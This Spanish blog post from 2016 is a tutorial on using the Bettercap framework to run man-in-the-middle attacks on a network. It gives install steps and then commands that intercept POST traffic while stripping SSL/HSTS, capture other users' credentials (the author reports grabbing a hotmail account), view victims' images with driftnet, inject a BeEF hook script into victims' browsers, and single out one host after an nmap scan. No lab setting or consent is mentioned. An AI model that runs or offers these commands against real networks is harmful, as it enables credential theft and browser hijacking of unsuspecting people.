martes, 13 de diciembre de 2016

Framework Bettercap - MITM

Saludos mis fieles lectores en esta oportunidad aprenderemos a realizar un ataque MITM y manipular el trafico de paquetes burlando la seguridad SSL de algunas plataformas.

¿Que es Bettercap?

Es una herramienta potente, flexible y portátil creada para realizar varios tipos de ataques MITM contra una red, manipular HTTP, HTTPS y tráfico TCP en tiempo real, capturar las credenciales y mucho más.

Referencia:
https://www.bettercap.org

Instalación: 

Instalaremos la dependencias, librerías gems de ruby y instalaremos desde los repositorios oficiales de Kali Linux.

root@kali:~# sudo apt-get install build-essential ruby-dev libpcap-dev
root@kali:~# apt-get update
root@kali:~# apt-get install bettercap

Otro metodo de instalación es mediante gem:

root@kali:~# gem install bettercap

Si deseas actualizar a una versión nueva ejecutas lo siguiente:

root@kali:~# gem update bettercap

En algunas oportunidades si ejecutamos desde la terminal bettercap nos arrojaría un error, para repararlo lo recomendable es bajar el repositorio de Github y proceder manualmente:

root@kali:~#  git clone https://github.com/evilsocket/bettercap
root@kali:~# cd bettercap
root@kali:~# gem build bettercap.gemspec
root@kali:~# sudo gem install bettercap*.gem

Si persiste el error debe fijarse si tiene la ultima versión de Ruby y Bundle simplemente:

root@kali:~# apt-get upgrade && gem install bundler

Luego de configurar correctamente bettercap pasaremos a ejecutarlo:

root@kali:~# sudo bettercap --proxy -P POST

En escenario hemos elegido capturar todos los paquetes de los dispositivos que se conecten a nuestra red bypasseando el protocolo SSL/HSTS de los servidores web protegidos.

Victima:







Podemos observar que hemos capturado un correo hotmail.com, también podemos utilizar driftnet para ver las imágenes de las webs visitadas.

root@kali:~# driftnet -i wlan0  ( en mi caso estoy conectado desde Wi-Fi ) si usted esta desde un cable de red es "eth0"

 De igual manera pueden ejecutar un ataque de direccionamiento con un Payload o un JS de BeEF infectando a tu victima mediante su navegador.

root@kali:~# bettercap --proxy-module --js-url http://192.168.1.2:3100/hook.js

Si usted desea ejecutar un ataque dirigido a un HOST especifico puede ejecutar lo siguiente:

root@kali:~#  bettercap -T 192.168.1.4 --proxy -P POST

Si desea saber que dispositivos están conectados a su red puede realizar un mapeo de redes con nmap mediante su rango:

root@kali:~#  nmap -sS -v -O 192.168.1.1/24

POST BeEF: 
https://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html

POST Nmap:
https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html

! Saludos !, ahora si hasta mas tarde mi fiel lector son las 4:54 de la mañana acá en Perú y este servidor tiene sueño jaja.

0 comentarios:

Publicar un comentario

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares